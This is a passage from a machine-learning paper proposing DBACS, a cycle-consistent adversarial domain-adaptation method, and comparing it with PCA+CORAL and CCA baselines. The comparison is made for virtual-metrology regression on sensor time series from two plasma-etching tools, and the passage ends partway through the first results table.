correlation and Canonical Correlation Analysis (CCA) Hardoon et al. (2004) for fault detection and performance evaluation. A review of MVL in the deep learning (DL) context is provided by Yan et al. (2021), while a range of CCA approaches is discussed in Chapman and Wang (2021). Metrology and its relationship to process control have been discussed in the literature, such as in early works such as Chen et al. (2005) and Su et al. (2007). While metrology is essential for quality and control, it can be costly in terms of productivity, which has led to the development of numerous virtual metrology (VM) approaches in the literature. VM is still an active research topic, with state-of-the-art methods like isolation forest being used in a decision-based model framework (e.g., Chien et al. (2022)). VM tools are often developed based on data from fault detection and classification (FDC) systems, which are monitoring software used to overview different types of equipment in semiconductor manufacturing. FDC data typically consists of descriptive statistics computed from raw, time-dependent physical sensor measurements installed on the equipment, making the VM problem a classic tabular data regression task. Given the high dimensionality of FDC data, feature selection is an important step in the context of tabular data VM and has been widely discussed in the literature ; see Saeys et al. (2007) for a general review of selection techniques and Kang et al. (2016) or Lynn et al. (2009) and Fan et al. (2020) for more sophisticated VM specific preprocessing and selection techniques. Other notable regression methods for VM prediction include those presented in Lynn et al. (2009); Susto and Beghi (2012) and Park and Kim (2016). Chen et al. (2020) compares tree-based methods for VM modeling to other regression methods and neural networks. Another set of approaches in the VM literature aims to solve the regression task using time series data collected from equipment sensor data. These approaches include those presented in Park and Kim (2016) and add Susto et al. (2015), which introduced the Supervised Aggregative Feature Extraction framework for feature selection. DL-based approaches have also been successfully employed for modeling with time series input data, such as in Lee and Kim (2020); Maggipinto et al. (2018, 2019) and Lee and Kim (2020). ## 3 Proposed Approaches In this section, a general description and mathematical formalization of a modeling task with heterogeneous input are given, including the necessary assumptions. We also provide a formal description of the methods and algorithms used to solve the task under exam. The modeling task at hand is formulated as regression, with the goal of scaling a selected model to make it usable for two data sets with different distributions and heterogeneous data representations. Since the input spaces do not have a common subspace sufficient for the task, the modeling must be done in a domain-specific manner. To address scalability, the goal is to use a trained statistical model for both data sets in parallel while minimizing the prediction error and maximizing the accuracy of a dedicated model. To achieve this, we compare methods from the field of domain adaptation and multi-view learning. First, we mathematically formalize the regression task followed by selected methods. Let \(f_{S}\) define a modeling task, let a hypothesis class \(\mathcal{H}\) be a set of all possible modeling functions \(h\in\mathcal{H}\) that are considered for a specific task. Let \(X_{S}\subset\mathbb{R}^{ns}\) be defined as the first input space and \(Y\) as the output space. The output space \(Y\) is defined as \(Y\subset\mathbb{R}\) in case of a regression task. A distribution over \(X_{S}\times Y\) is called source domain. For time series data, let \(X_{S}\subset\mathcal{T}\times\mathbb{R}^{ns}\) where \(\mathcal{T}\) describes the set of considered points in time and \(x_{S}^{n}\in\mathbb{R}^{ns}\) a sample from the source feature space taken at a fixed point in time \(t\in\mathcal{T}\). A learning algorithm is provided with a source data set \(S\) drawn i.i.d. from the source domain \(D_{S}\) with \(X_{S}\times Y_{S}\), \(X_{S}\subset X\), \(Y_{S}\subset Y\). In the SSL setting, it is distinguished between labeled and unlabeled data and define \(S:=SL\cup SU\) where \(SU\) stands for the unlabeled source sample subset and \(SL\) for the labeled one. Without loss of generality for UDA and SSL, \(SU=\emptyset\) sine the source domain is assumed to be labeled. Hence \[S=\{X_{S},Y_{S}\}=\{X_{SL},Y_{SL}\}=\{x_{S}^{i},y_{S}^{i}\}_{i=1}^{ns}\sim\{D_ {S}\}^{n_{s}}, \tag{1}\] with \(n_{S}\) being the number of drawn samples (all labeled) and therefore \(X_{S}=X_{SL}\subset\mathbb{R}^{ns}\), \(Y_{S}=Y_{SL}\subset Y\). A learning algorithm is provided with a second set \(T\) drawn i.i.d. from the target domain \(D_{T}\) with different data distribution, representation and feature space. Hence, let \(T=TL\cup TU\) be the second called target data set \(T\) drawn i.i.d. from a target domain \(D_{T}\) with a distribution over \(X_{T}\times Y_{T}\), \(X_{T}\subset\mathbb{R}^{n_{T}}\), \(Y_{T}\subset Y\), and consisting of unlabeled \(TU\) and/or labeled \(TL\) samples. \[TL=\{X_{TL},Y_{TL}\}=\{x_{T}^{j},y_{T}^{j}\}_{j=1}^{n_{T}-l}\sim\{D_{T}\}^{n_{ t}-l}; \tag{2}\] \[TU=\{X_{TU}\}=\{x_{T}^{j}\}_{j=n_{T}-l+1}^{n_{T}}\sim\{D_{T}^{X}\}^{n_{t}}; \tag{3}\] with \(n_{T}\) being the number of drawn target samples, therefore \(X_{TL}\subset X_{T}\subset\mathbb{R}^{n_{T}}\), \(Y_{TL}\subset Y_{T}\subset Y\) and \(X_{TU}\subset X_{T}\subset\mathbb{R}^{n_{T}}\). For time series data, let \(X_{T}\subset\mathcal{T}\times\mathbb{R}^{n_{T}}\) where \(\mathcal{T}\) describes the set of considered points in time and \(x_{T}^{t}\in\mathbb{R}^{n_{T}}\) a sample from the target feature space taken at a fixed point in time \(t\in\mathcal{T}\). ### DANN-based Alignment with Cyclic Supervision (DBACS) In this work, we present a new framework, called DANN-based Alignment with Cyclic Supervision (DBACS). The DBACS approach (illustrated in Figure 1) is an extented version of DBAM Gentner et al. (2021) and is designed for binary heterogeneous domain adaptation using source and target domain. DBACS consists of five main parts: * the baseline or reference _prediction_ model \(P\); * an encoder/alignment model called _aligner_\(F\) used to map the target domain to the source domain (the output of the aligner is called aligned); * \(F\) is connected to a second encoder/alignment model _aligner_\(G\) that maps the source domain to the target domain. By combining both aligners, it is possible to introduce _cycle-consistency_ by comparing source samples with its cycled sample and target samples with its cycled samples; * a domain _discriminator_\(A\) for classification of source domain versus aligned target domain; * Adversarial training in both directions is enabled by adding a second domain discriminator (called _discriminator_\(B\)) for target versus aligned source comparison. The various components of the DBACS architecture are discussed in the following. Prediction lossLet \(h_{P}:X_{S}\to Y\) be a dedicated statistical model trained on a data set \(S\), let \(S\) be a labeled source sample set drawn i.i.d. from a domain \(D_{S}\) with \(n_{S}=|S|\) being the number of drawn samples. The neural network representation is parameterized by \(\theta_{P}\) and \(P(x_{S},\theta_{P})\) where \(P\) is the model function with parameters \(\theta_{P}\) that outputs the prediction for \(x_{S}\in X_{S}\). The loss \(L_{P}\) used for training and minimization is defined as: \[\min_{h_{P}\in\mathcal{H}}L_{P}(X_{S})=\min_{h_{P}\in\mathcal{H}}L_{D_{S}}(h_{ P}(X_{S}))=\min_{\theta_{P}}L_{D_{S}}(X_{S},\theta_{P})=\min_{\theta_{P}} \mathbf{L}_{(x,y)\in S}\left(P\left(x,\theta_{P}\right),y\right). \tag{4}\] where \(\mathbf{L}\) is selected based on the modeling task at hand; for VM regression task we choose mean absolute error (MAE). Cycle consistency lossLet \(h_{F}:X_{T}\to X_{S}\) be a statistical model function aligning target to source and \(F(x_{T},\theta_{F})\) be its parameterized representation where \(F\) is the model function with parameters \(\theta_{F}\) that outputs the prediction for \(x_{T}\in X_{T}\). Let \(h_{G}:X_{S}\to X_{T}\) be a statistical model function aligning source to target and \(G(x_{S},\theta_{G})\) be its parameterized representation where \(G\) is the model function with parameters \(\theta_{G}\) that outputs the prediction for \(x_{S}\in X_{S}\). Let \(x_{S}\sim D_{S}\) the data distribution according to \(D_{S}\) and \(x_{T}\sim D_{T}\) according to \(D_{T}\). Then, the cycle-consistency loss is defined as: \[L_{cycle_{S}}(X_{S}):=L_{G,F,D_{S}}(X_{S})=\mathbf{L}_{x_{S}\sim D_{S}}\left(F (G\left(x_{S},\theta_{G}\right),\theta_{F})\right)=\mathbf{L}_{x_{S}\sim D_{S} }(F(G(x_{S})),x_{S}); \tag{5}\] \[L_{cycle_{T}}(X_{T}):=L_{F,G,D_{T}}(X_{T})=\mathbf{L}_{x_{T}\sim D_{T}}\left(G (F\left(x_{T},\theta_{F}\right),\theta_{G})\right)=\mathbf{L}_{x_{T}\sim D_{T} }(G(F(x_{T})),x_{T}). \tag{6}\] To give an example we follow the description in Zhu et al. (2017) where the \(L_{1}\) norm is used as cycle loss function: \[L_{cycle_{S}}(X_{S})=\mathbf{L}_{x_{S}\sim D_{S}}(F(G(x_{S})),x_ {S})=\mathbf{E}_{x_{S}\sim D_{S}}\left[\left\|F(G(x_{S}))-x_{S}\right\|_{1}\right] \tag{7}\] \[L_{cycle_{T}}(X_{T})=\mathbf{L}_{x_{T}\sim D_{T}}(G(F(x_{T})),x_ {T})=\mathbf{E}_{x_{T}\sim D_{T}}\left[\left\|G(F(x_{T}))-x_{T}\right\|_{1}\right] \tag{8}\] In short, the cycle consistency loss is defined as \[\mathcal{L}_{cyc}(F,G,X_{S},X_{T})=L_{cycles}(X_{S})+L_{cycle_{T}}(X_{T}). \tag{9}\] Here, the optimization goal is to reproduce a bijective mapping so that each \(x_{S}\in X_{S}\) is mapped to \(X_{T}\) and back to \(X_{S}\) with \(F(G(x_{S}))\approx x_{S}\). The same goes for \(x_{T}\in X_{T}\) with \(G(F(x_{T}))\approx x_{T}\). Figure 1: **Graphical representation of the proposed DBACS system** exploiting input data from two non-identical domains. The arrows represent the data flows. An autoencoder shaped aligner can be used for noise reduction especially for homogeneous DA but is not mandatory. Adversarial lossLet \(h_{D_{A}}:X_{S}\to I\), \(h_{D_{B}}:X_{T}\to I\) with \(I=[0,1]\) be two statistical model functions describing respectively the distance of source versus aligned target and target versus aligned source. Let \(h_{D_{A}}\) be parameterized by \(\theta_{D_{A}}\) and let \(D_{A}(x_{S},\theta_{D_{A}})\) be the parameter representation of discriminator A where \(D_{A}\) is the model function with parameters \(\theta_{D_{A}}\) that outputs the prediction for \(x_{S}\in X_{S}\). Let \(h_{D_{B}}\) be parameterized by \(\theta_{D_{B}}\) and let \(D_{B}(x_{T},\theta_{D_{B}})\) be the parameter representation of discriminator B where \(D_{B}\) is the model function with parameters \(\theta_{D_{B}}\) that outputs the prediction for \(x_{T}\in X_{T}\). Then the adversarial loss first for source \(L_{adv_{S}}\) and second for target \(L_{adv_{T}}\) is defined based on a selected loss function \(\mathbf{L}\): \[L_{adv_{S}}(X_{S},X_{T}) :=L_{D_{A},D_{S}}(X_{S})-L_{D_{A},D_{T}}(X_{T})\] \[=\mathbf{L}_{x_{S}\sim D_{S}^{X}}\left(h_{D_{A}}\left(x_{S}\right) \right)-\mathbf{L}_{x_{T}\sim D_{T}^{X}}\left(h_{D_{A}}\left(h_{F}(x_{T}) \right)\right)\] \[=\mathbf{L}_{x_{S}\sim D_{S}^{X}}\left(D_{A}\left(x_{S},\theta_{D _{A}}\right)\right)-\mathbf{L}_{x_{T}\sim D_{T}^{X}}\left(D_{A}\left(F(x_{T}, \theta_{F}),\theta_{D_{A}}\right)\right) \tag{10}\] \[L_{adv_{T}}(X_{S},X_{T}) :=L_{D_{B},D_{T}}(X_{T})-L_{D_{B},D_{S}}(X_{S})\] \[=\mathbf{L}_{x_{T}\sim D_{T}^{X}}\left(h_{D_{B}}\left(x_{T}, \theta_{D_{B}}\right)\right)-\mathbf{L}_{x_{S}\sim D_{S}^{X}}\left(h_{D_{B}} \left(h_{G}(x_{S},\theta_{G}),\theta_{D_{B}}\right)\right) \tag{11}\] The adversarial loss is applied to the output of each discriminator and enables an adversarial training approach (see Gentner et al. (2021), Gulrajani et al. (2017)). For a regression modeling task: Let \(I\subset\mathbb{R}\) or \(I=\mathbb{R}\) and the discriminator a regression model with linear output activation function. Then the adversarial loss is defined as \[L_{adv_{S}}(X_{S},X_{T}) =\mathbf{E}_{x_{S}\sim D_{S}}\left[D_{A}\left(x_{S},\theta_{D_{A}} \right)\right]-\mathbb{E}_{x_{T}\sim D_{T}}[(D_{A}(F(x_{T},\theta_{F}),\theta_{ D_{A}}))], \tag{12}\] \[L_{adv_{T}}(X_{S},X_{T}) =\mathbf{E}_{x_{T}\sim D_{T}}\left[D_{B}\left(x_{T},\theta_{D_{B} }\right)\right]-\mathbb{E}_{x_{S}\sim D_{S}}[(D_{B}(G(x_{S},\theta_{G}),\theta _{D_{B}}))], \tag{13}\] where \(\mathbf{E}\) defines the expected value and the loss is an approximation of the Wasserstein distance of two sampled distributions, for details see Gulrajani et al. (2017). RemarkIt is recommended by Zhu et al. (2017) based on Taigman et al. (2017) to add one more additional loss term namely the identity loss. The idea is that if almost identical samples in the other domain occur, the aligner should perform close to an identity function. Since source and target are heterogeneous in our case we do not apply this kind of loss. The training itself happens in an adversarial setting with a two-player game approach. The adversarial training routine includes parallel training of both aligner and both discriminator using adversarial loss plus inclusion of the additional loss terms. For training, two fixed training data sets \(S\) and \(T\) (training samples are drawn i.i.d from \(D_{S}\) and \(D_{T}\)) are used. During the aligners training phase, the adversarial loss is minimized, during discriminator training phase it is maximized (or its negative value minimized).: * The first competitor of the adversarial training is the discriminator \(D_{A}\) trained to distinguish between source and aligned target data meaning optimizing the adversarial source loss. In parallel the discriminator \(D_{B}\) is trained to distinguish between target and aligned source data also meaning optimizing the adversarial target loss. The optimization of the discriminator A and discriminator B loss \(L_{D_{total}}\) is defined as \[\max_{\theta_{D_{A}},\theta_{D_{B}}}L_{D_{total}}(X_{S},X_{T}) =\max_{\theta_{D_{A}}}L_{adv_{S}}(X_{S},X_{T})+\max_{\theta_{D_{B} }}L_{adv_{T}}(X_{S},X_{T})\] \[=\max_{\theta_{D_{A}}}L_{D_{A},D_{S}}(X_{S},\theta_{D_{A}})-L_{D_ {A},D_{T}}(F(X_{T},\theta_{F}),\theta_{D_{A}})\] \[+\max_{\theta_{D_{B}}}L_{D_{B},D_{T}}(X_{T},\theta_{D_{B}})-L_{D_ {B},D_{S}}(G(X_{S},\theta_{G}),\theta_{D_{B}})\] \[=\max_{\theta_{D_{A}}}\mathbf{L}_{x_{S}\in S}\left(D_{A}\left(x_{ S},\theta_{D_{A}}\right)\right)-\mathbf{L}_{x_{T}\in T}\left(D_{A}\left(F(x_{T}, \theta_{F}),\theta_{D_{A}}\right)\right)\] \[+\max_{\theta_{D_{B}}}\mathbf{L}_{x_{T}\in T}\left(D_{B}\left(x_{ T},\theta_{D_{B}}\right)\right)-\mathbf{L}_{x_{S}\in S}\left(D_{B}\left(G(x_{S}, \theta_{G}),\theta_{D_{B}}\right)\right)\] (14) * The second competitor in the adversarial training is the aligner cycle. We define \(L_{A_{total}}\) using the adversarial loss for both aligners and the cycle consistency loss. In case of labeled target data the aligner \(F\) is also updated in order to optimize prediction loss \(L_{P}\) for aligned target data. The adversarial part of the aligner losses is set in opposite direction compared to the ones used to update the two discriminator: \[\min_{\theta_{F},\theta_{G}}L_{A_{total}}(X_{S},X_{T}) =\min_{\theta_{F},\theta_{G}}\alpha_{adv_{S}}L_{adv_{S}}\left(X_{S},X_{T}\right)+\lambda_{P}L_{P}\left(F(X_{T})\right)+\lambda_{adv_{T}}L_{adv_{T}} \left(X_{S},X_{T}\right)\] \[=\min_{\theta_{F},\theta_{G}}\left[-\mathbf{L}_{x_{T}\in T}\left(D_{A }\left(F(x_{T},\theta_{F}),\theta_{D_{A}}\right)\right)\right.\] \[+\lambda_{P}\mathbf{L}_{(x_{T},y)\in TL}(P\left(F(x_{T},\theta_{F}), \theta_{P}\right))-\mathbf{L}_{x_{S}\in S}\left(D_{B}\left(G(x_{S},\theta_{G}), \theta_{D_{B}}\right)\right)\] (15) where \(\lambda_{(\cdot)}\) represents the weight assigned to each corresponding loss term. For \(\lambda_{P}=0\) the training happens in an unsupervised setting where no target labels are available. A gradient penalty regularization term is added when updating both aligners following the recommendations of Gulrajani et al. (2017). ### Subspace Alignment using Principle Component Analysis Subspace Alignment (SA), presented by Fernando et al. (2013), linearly aligns subspaces generated by Principle Component Analysis (PCA). SA was introduced as unsupervised DA method for classification task. Overall benefits of SA lies in the simplicity and in the speed of the method while still presenting high accuracy. For heterogeneous domain adaptation, we slightly adapt here the SA approach by first applying PCA separately to source and target and then align the corresponding subspaces using CORrelation ALignment (CORAL). CORAL by Sun et al. (2016) is an unsupervised domain adaptation method that aligns second order statistics of source and target domain. PcaPrinciple Component Analysis (PCA) is a linear transformation of a vector space with respect to its points/vectors. The projection is created in a way that highest occurring variance is represented by the first latent dimension (the so-called first principle component), the second highest variance by the second principle component and so on. Let \(X\) be a vector space, let \(\psi:X\to X^{\prime}\) define the nonlinear principle component transformation to be computed. Then PCA is formalized via \[x^{\prime}=\psi(x)=\Gamma^{T}x \tag{16}\] where \(x^{\prime}\in X^{\prime}\) describes the transformed input, \(\Gamma\) consists of the eigenvectors and is computed via \(\Lambda=\Gamma^{T}\Sigma\Gamma\) where \(\Lambda\) is a diagonal matrix defined by the eigenvalues and \(\Sigma\) is the covariance matrix. PCA is applied to \(X_{S}\) and \(X_{T}\) accordingly resulting in \(S^{\prime}\) and \(T^{\prime}\) as projected input sets. Since PCA is a very well-known method, we refer to Jolliffe (2010) for a more detailed description. CoralLet \(S^{\prime}=\{x^{\prime}_{S_{i}}\}\), \(T^{\prime}=\{x^{\prime}_{T_{i}}\}\) be the PCA projected input sets from the source and target domains. Let \(\Upsilon:X^{\prime}_{S}\to X^{\prime}_{T}\) with \(\Upsilon(X^{\prime}_{S})=X^{\prime}_{S}\ast A\) describe the feature transformation of the source space to the target space. Let \(\mu_{S^{\prime}},\mu_{T^{\prime}}\) be the feature mean of \(S^{\prime}\), \(T^{\prime}\) and \(C_{S^{\prime}},C_{T^{\prime}}\) the corresponding covariance matrices. Then, the distance between the covariance matrices (assuming normalized features with zero mean) is minimized by: \[\min_{A}\left\|C_{\hat{S^{\prime}}}-C_{T^{\prime}}\right\|_{F}^{2}=\min_{A} \left\|A^{T}C_{S^{\prime}}A-C^{\prime}_{T}\right\|_{F}^{2}\] where \(A\) is the matrix used in linear transformation that is applied to the source, \(C_{\hat{S^{\prime}}}\) describes the covariance of the transformed source features \(S^{\prime\ast}A\) and \(\left\|\cdot\right\|_{F}^{2}\) denoting the squared Frobenius norm selected as distance metric. It is called CORAL loss. In order to solve this equation, we follow Algorithm 1 in Sun et al. (2016) and compute first the covariance matrices followed by whitening the source and then recoloring it with the target covariance. ### Canonical Correlation Analysis (CCA) Canonical Correlation Analysis (CCA) defines linear transformation for each set of variables such that after the transformation the projected features are maximal correlated. A summary of the descriptions is taken from Hardoon et al. (2004). Let \(S=\{x_{S}\},T=\{x_{T}\}\) be two sample sets wanted to be projected into direction \(w_{S},w_{T}\). Let \(\Phi_{S}:X_{S}\to X^{\prime}_{S}\), \(\Phi_{T}:X_{T}\to X^{\prime}_{T}\) define the linear transformation for each domain. Then: \[\Phi_{S}(S)=S^{{}^{\prime}}=S_{x_{S},w_{S}}=\langle w_{S},x_{S}\rangle,\] \[\Phi_{T}(T)=T^{{}^{\prime}}=T_{x_{T},w_{T}}=\langle w_{T},x_{T}\rangle. \tag{17}\] Specifically, it is looked for \(w_{S},w_{T}\) such that the correlation between the projected vectors is maximised, hence: \[\rho=\max_{w_{S},w_{T}}corr\left(S_{x_{S},w_{S}},T_{x_{T},w_{T}}\right)=\max_ {w_{S},w_{T}}\frac{\langle S_{x_{S},w_{S}},T_{x_{T},w_{T}}\rangle}{\|S_{x_{S},w_{S}}\|\cdot\|T_{x_{T},w_{T}}\|}. \tag{18}\] The previous equation can be reformulated as \[\rho=\max_{w_{S},w_{T}}\frac{w^{\prime}_{S}\mathbb{E}[x_{S}x^{\prime}_{T}]w_{T }}{\sqrt{w^{\prime}_{S}\mathbb{E}[x_{S}x^{\prime}_{S}]w_{S}w^{\prime}_{T} \mathbb{E}[x_{T}x^{\prime}_{T}]w_{T}}} \tag{19}\] with \(\mathbb{E}\) denoting the discrete empirical expectation, \({}^{\prime}\) denotes the transpose of a vector or a matrix and properties of the inner product are used. Using the covariance matrix with \[C=C(x_{S},x_{T})=\mathbb{E}[x_{S}x_{T}]=\begin{bmatrix}C_{x_{S}x_{S}}&C_{x_{T}x_{ S}}\\ C_{x_{S}x_{T}}&C_{x_{T}x_{T}}\end{bmatrix} \tag{20}\] where C is a block matrix with the within-covariance \(C_{x_{S}x_{S}},C_{x_{T}x_{T}}\) and between-covariance matrices \(C_{x_{S}x_{T}},C_{x_{T}x_{S}}\) as entries. Finally the optimization problem can be formulated in the following way: \[\rho=\max_{w_{S},w_{T}}\frac{w_{s}^{\prime}C_{x_{S}x_{T}}w_{T}}{\sqrt{w_{S}^{ \prime}C_{x_{S}x_{S}}}w_{S}w_{T}^{\prime}C_{x_{T}x_{T}}w_{T}} \tag{21}\] By checking that rescaling of \(w_{S},w_{T}\) does not change the problem, it can be maximized subject to \[w_{S}^{\prime}C_{x_{S}x_{S}}w_{S} =1,\] \[w_{T}^{\prime}C_{x_{T}x_{T}}w_{T} =1. \tag{22}\] The formulation of the dual problem is used, hence computing the corresponding Lagrangian L leads to \[L(\lambda,w_{S},w_{T})=w_{s}^{\prime}C_{x_{S}x_{T}}w_{T}-\frac{\lambda_{S}}{2 }(w_{S}^{\prime}C_{x_{S}x_{S}}w_{S}-1)-\frac{\lambda_{T}}{2}(w_{T}^{\prime}C_{ x_{T}x_{T}}w_{T}-1). \tag{23}\] The partial derivatives in the direction of \(w_{S},w_{T}\) are: \[\frac{\partial L}{w_{S}} =C_{x_{S}x_{T}}w_{T}-\lambda_{S}C_{x_{S}x_{S}}w_{S}=0, \tag{24}\] \[\frac{\partial L}{w_{T}} =C_{x_{T}x_{S}}w_{S}-\lambda_{T}C_{x_{T}x_{T}}w_{T}=0. \tag{25}\] Multiplying (25) with \(w_{S}*\) and multiplying (24) with \(w_{T}*\) and subtracting the one from the other, define \(\lambda=\lambda_{S}=\lambda_{T}\), assuming \(\bar{C}_{x_{T}x_{T}}\) is invertible, rearrange the equation and use the partial derivative leaves to \[C_{x_{S}x_{T}}C_{x_{T}x_{T}}^{-1}C_{x_{T}x_{S}}w_{S}=\lambda^{2}C_{x_{S}x_{S}} w_{S} \tag{26}\] which is equivalent to a generalised eigenproblem of the form \(Ax=\lambda Bx\). Using Cholesky decomposition, the previous can be even more simplified to a symmetric eigenvalue problem \(Ax=\lambda x\). For visualization see Figure 2. ## 4 Case Study: Dataset Description and Experimental Settings ### Semiconductor Manufacturing: Etching process and Virtual Metrology Wafers are the basis for every semiconductor manufacturing process. A wafer consists of pure (99.9999%) silicon, has a disc shape and houses several thousand chips (the end product) on average. The specific technology structure of a chip is built up layer by layer on the wafer during a couple of hundred process steps. Each wafer is considered a separate sample in this work. Figure 2: **Visualization of Canonical Correlation Analysis (CCA).** The canonical components of source and target are a weighted combination of corresponding input features. The correlation of the canonical components within the red box is maximized. Similarly to PCA, the number of canonical components can be tuned. Etching is a common process in semiconductor manufacturing and is frequently studied and discussed in semiconductor research and literature, along with chemical vapor deposition and implantation. The etching process removes material from a surface or transfers a structure created during the lithography step to the layer below Hilleringham (1996); May and Spanos (2006). Reactive-ion etching uses a high-frequency alternating energy field applied to the cathode on which the wafer is placed. Positively charged ions in the plasma are accelerated towards the wafer and collide with its surface at high kinetic energy, causing atoms from the wafer's surface to be dislodged from the crystal lattice, resulting in partial physical etching. In addition, a partial chemical reaction occurs due to the highly reactive free radicals. The plasma etching process includes up to ten sub-steps during which input sensors must be adjusted to the target values specified in a recipe. Sensors that measure properties such as chamber pressure, applied high frequency voltage, gas type, gas flow, and wafer temperature, as well as electrode temperature and bias, play a crucial role in achieving the desired wafer properties. End point detection, or the etching time, is one of the most critical aspects of the process, as it is highly sensitive and closely related to other variables such as gases, pressure, current, and temperature. Incorrect etching times, inadequate end point detection, uncontrolled reactions, and interference in the chamber can negatively affect the layer thickness and overall quality and functionality of the wafer. Process monitoring and control are essential for reliable, standardized, and repeatable production processes that produce high-quality products. In this work, we focus on a process control method called virtual metrology (VM) and analyze it through a case study involving an etching process. In general, control quantities are typically measured in metrology stations or tools after the process is completed, using multiple measurements on a sample of wafers. Traditional metrology is a univariate or multivariate control system that uses control charts with defined upper and lower control limits to monitor process performance. However, due to cost and time constraints, not all wafers can be physically measured after the process. Virtual metrology (VM) or soft sensing modules utilize data collected by process equipment to model the relationship between wafer properties and process input and feedback sensor measurements. VM techniques allow for the inclusion of non-measured but predicted control measures in order to enhance analysis. VM technologies offer several benefits, including: * _costs and time savings_ due to reduced mandatory measurements; * _quality assurance_ through enhanced and comprehensive monitoring; * _real-time control, assessment and process updates_ in conjunction with Run-to-Run controllers Su et al. (2007); * _data-driven process optimization_ including fault detection, root cause analysis and improved sample selection Feng et al. (2019). ### Data Preparation The data used in this work is collected from two different etching equipment types from the same vendor. The data set is restricted to a specific etching recipe that was transferred from one equipment to the other and now runs regularly on both equipment. Raw sensor measurements in form of time series data and their corresponding metrology/inline measurements over a period of 3 years are considered. * older equipment type hence higher number of samples (\(\sim\)10 000) and original tool to run the specific recipe - is selected as source; * newer equipment type with \(\sim\)6000 data samples - is defined as target. The following preprocessing steps were applied to the collected time series sensor data, with each equipment treated separately due to its heterogeneous nature: 1. removal of constant features; 2. removal of features that show small fluctuation that can be detect as noise (variations smaller than \(0.01\)) and a constant behavior underneath the noise; 3. removal of samples showing label outliers based on interquantile range; 4. removal of samples where the length of the time series lies below or above 25 percent respective 75 percent quantile of time series length; 5. equal-distributed upsampling of timestamps and feature values to generate time series with equal length. 33 features for equipment type 1 respective 49 for equipment type 2 are finally selected as input features. No significant label shift is detected, see Figure 3. ### Experimental Design Virtual metrology is modeled as prediction task with sensor data as input mapped to a single continuous metrology value. Due to the heterogeneous nature of the data representation from equipment type 1 and 2, no common model can be used without additional transfer. We present the analysis in the following order: 1. DBACS is trained and tested as domain adaptation model using autoencoder to align the original input features to enable usage of a dedicated pretrained model; 2. PCA and CCA are selected as benchmark models; for the heterogeneous VM task the alignment happens by creating a common (latent) feature space that is then used to train a common model. CORAL on the latent features is tested as final combination for both PCA and CCA. For training, distribution comparison and alignment evaluation the following metrics are considered: * Mean absolute error (MAE) is used as performance based loss; Adam optimizer is applied for training; * the divergence between data selected from source and data selected from target domain - we use Frechet inception distance (FID); * 5-fold cross validation is applied, hence split both data sets into 5 subsets each and using 4 merged sets as train and 1 as test set per fold. Architectures of all models stay fixed for all 5 folds; * pearson correlation of features is tested after alignment. For the correlation analysis we use the function implementation available in python module _numpy_Harris et al. (2020) and for PCA and CCA we use existing function implementation in the python module _scikit-learn_Pedregosa et al. (2011). For CORAL we use the implementations from the python module _transfertools_Vincent et al. (2020). DBACS is trained using the described adversarial training approach. PCA and CCA expect a two dimensional input, hence we keep the original data and reshape the 3 dimensional sample into a two dimensional one by treating each value at each time step as separate sample. The selected number of latent features are based on the variation coverage of both domains. In the following, model details and hyperparameters choices are reported. Dbcas1DCNN is chosen since it is simple but proven to be well performing for time series data Gentner et al. (2021). * The predictor consists of 3 convolutional layers (dimension 32, 16, 8 and kernel size 53, 33 and 33), followed by one max pooling layer, a flattening layer and two dense layers (dimension 16 and 1, Leaky ReLU activation except sigmoid output). * The domain discriminators both have the same architecture besides the respective input shape: 3 convolutional layers (dimension 24, 16 and 8, kernel size 17), causal padding and leaky ReLU activation function, max Figure 3: **Boxplot of normalized layer thickness from two equipment. Boxplot graphs of normalized metrology/inline measurements from both equipment types considered in the analysis.** pooling of size 4 and 2 times 2, followed by a flattening layer and 6 dense layers (dimension 512, 256, 128, 64, 32, 1, Leaky ReLU activation and linear output). * Both aligners consist of 6 convolutional layers, first 5 followed by Leaky ReLU activation function, the final output is kept linear. The aligner that maps target domain to source domain has filter size 48, 42, 36, 32, 32 and final filter size is set to number of features of the source domain; kernel size is 37, 37, 37, 37, 57 and 7. Upsampling with size 3 and 2 is done after 4th and 5th layer block. The aligner that maps source domain to target domain has filter size 32, 36, 42, 46, 48 and final filter size is set to number of features of the target domain; kernel size is also 37, 37, 37, 37, 57 and 7. Upsampling with size 3 and 2 is also done after 4th and 5th layer block. For an improved initialization both aligners are pretrained separately using SSIM loss Wang et al. (2004): therefore, we select sample pairs from source and target based on closest label value. PCA and CORALThe 3 dimensional input is reshaped into a two dimensional one by treating each value at each time step as separate sample. For each equipment type, we select the first 10 principal components in order to cover around \(95\%\) variance and to create same dimensional input space. For equipment type 1 we cover \(97\%\) of the variance and for equipment type 2 we cover \(94\%\). 1DCNN prediction model with reduced number of features based on PCA (reshaped back to 3 dimensions) of source and target domain is used as prediction model. Cca27 canonical components (CCs) are kept since it shows the most stable results in our experiments. The original data is reshaped from 3 dimensional input into a two dimensional one by treating each value at each time step as separate sample. 1DCNN prediction model with reduced number of features based on CCA (reshaped back to 3 dimensions) of source and target domain is used as prediction model. ## 5 Experimental Results Table 1 shows the average 5 fold CV results for DBACS compared to the dedicated lower bound values meaning performance errors for dedicated models trained only on source and only on target data. The numbers given in Table 1 confirm the visual convergence seen in the t-SNE plot in Figure 4. This is supported by frechet inception distance (FID) \(0.01\) for outer domain distance after alignment compared to FID inner domain distance close to 0 for equipment type 1 as well as for equipment type 2. Next, Figure 5 shows true versus predicted values of different alignment states - randomly initialized aligner, after the pretraining of the aligner and after DA training with DBACS). Again, the visualization supports the results presented in Table 1: Enabeling usage of a dedicated source model to mapped target data for high accuracy predictions. A visualization of both aligners output is presented in Figure 6 and compared to original domain sensor signals. Next, we present results for PCA analysis in Table 2. Optional DA with CORAL on top shows slightly improved results if model is trained on data from both domains. The FID score for outer domain distance after PCA + CORAL on the latent features generated by PCA is significant lower than before with \(0.0001\) for train and \(0.001\) for test. Only the first two principal components show a correlation higher than \(r=0.5\). For CCA, the performance is presented in Table 3. Optional DA with CORAL on top shows improved results since model training for both domains is enabled and can be executed using CCs. The FID score for outer domain distance after CCA + CORAL on the latent features generated by CCA is again significant lower than before with very close to \(0\) \begin{table} \begin{tabular}{l|l|l||l|l} & \multicolumn{2}{c||}{Source domain} & \multicolumn{2}{c}{Target domain} \\ \hline & Train & Test & Train & Test \\ \hline \hline Lower Bound & \(0.084\) & \(0.094\) & \(0.102\) & \(0.128\) \\ \hline DBACS & \(0.084\) & \(0.094\) & \(0.102\) & \(0.131\) \\ \end{tabular} \end{table} Table 1: **DBACS performance errors for source and aligned target.** Source and aligned target data DBACS training and test scores average over 5 fold CV. Target data is mapped to source domain using trained aligner \(F\) from DBACS and evaluated after the mapping using the VM prediction model trained on source. Lower bound prediction models are 